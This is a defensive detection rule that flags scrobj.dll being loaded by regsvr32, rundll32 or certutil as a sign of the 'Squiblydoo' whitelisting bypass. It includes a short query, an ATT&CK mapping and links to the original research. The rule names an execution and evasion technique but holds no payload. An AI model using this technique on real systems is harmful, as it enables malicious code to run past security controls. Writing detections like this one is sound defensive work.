Suspicious Script Object Execution

Identifies scrobj.dll loaded into unusual Microsoft processes, often indicating a Squiblydoo attack.

id:a792cb37-fa56-43c2-9357-4b6a54b559c7 categories:detect confidence:medium os:windows created:11/30/2018 updated:11/30/2018

MITRE ATT&CK™ Mapping

tactics:Defense Evasion, Execution techniques:T1117 Regsvr32

Query

image_load where image_name == "scrobj.dll" and
  process_name in ("regsvr32.exe", "rundll32.exe", "certutil.exe")

Detonation

Atomic Red Team: T1117

Contributors

• Endgame

References

• https://web.archive.org/web/20170427203617/http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
• https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302